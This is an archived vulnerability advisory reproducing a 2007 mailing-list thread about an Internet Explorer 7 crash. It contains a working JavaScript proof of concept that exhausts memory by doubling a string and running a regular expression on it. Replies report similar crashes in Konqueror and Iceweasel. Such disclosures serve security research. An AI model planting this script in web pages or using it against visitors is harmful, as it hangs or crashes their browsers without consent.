Internet Explorer Crash

2007.04.24
Credit: J. Oquendo
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Nope. Ran this one against Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2, and it didn't even flinch. No OOM-killing here. On the other hand, Konqueror 3.5.5 "release 45.4" churned swap madly for about five minutes (the machine continued to run well enough if just a bit slower) until Konq sig-sixed itself. Cheers The Anarcat wrote: > Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US; > rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1) > > I would think that Firefox and most browsers implementing javascript > would die an horrible OOM death on this. > > A. > > On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote: > Product: Internet Explorer Version 7.0.5730.11 > Impact: Browser crash possibly more > Author: Jesus Oquendo > echo @infiltrated|sed 's/^/sil/g;s/$/.net/g' > > > I. BACKGROUND > Why bother? Who doesn't know what Internet Explorer and Microsoft are. > > II. DESCRIPTION > IE 7 is vulnerable to a script which causes the browser to hang. The > memory and CPU usage go through the roof. Originally the script caused > (and still causes) Safari and Konqueror to crash. > > III SOLUTION > Stop using Microsoft products or deal with a new advisory every other > day. > > IV. Proof > http://www.infiltrated.net/stupidInternetExploder.html > > V. Code > > $ more /stupidInternetExploder.html > > <script> > > var reg = /(.)*/; > > var z = 'Z'; > while (z.length <= > 999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999999999999999999999999999999 > 999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999999999999999999999999999999999999999999999999999 99999999999999 > 999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999999999999999999999999999999999999999999999999999 99999999999999 > 999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999999999999999999999999999999999999999999999999999999999999 99999999999999 > 999999999999999999999999999999999999999999999999999999999999999999999999 999999999999999999) z+=z; > var boum = reg.exec(z); > > </script> > > Goodbye > > > J. Oquendo > http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 > sil . infiltrated @ net http://www.infiltrated.net > > The happiness of society is the end of government. > John Adams > > >> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org iD8DBQFGJVHvtHLm/XkyJlsRApr1AKCLOVJLSHhSRV9edwUm2QNLNry9RwCgxFeX N1X/wJSO4U4Sx3z5Yn0S6Tk= =T/tc -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top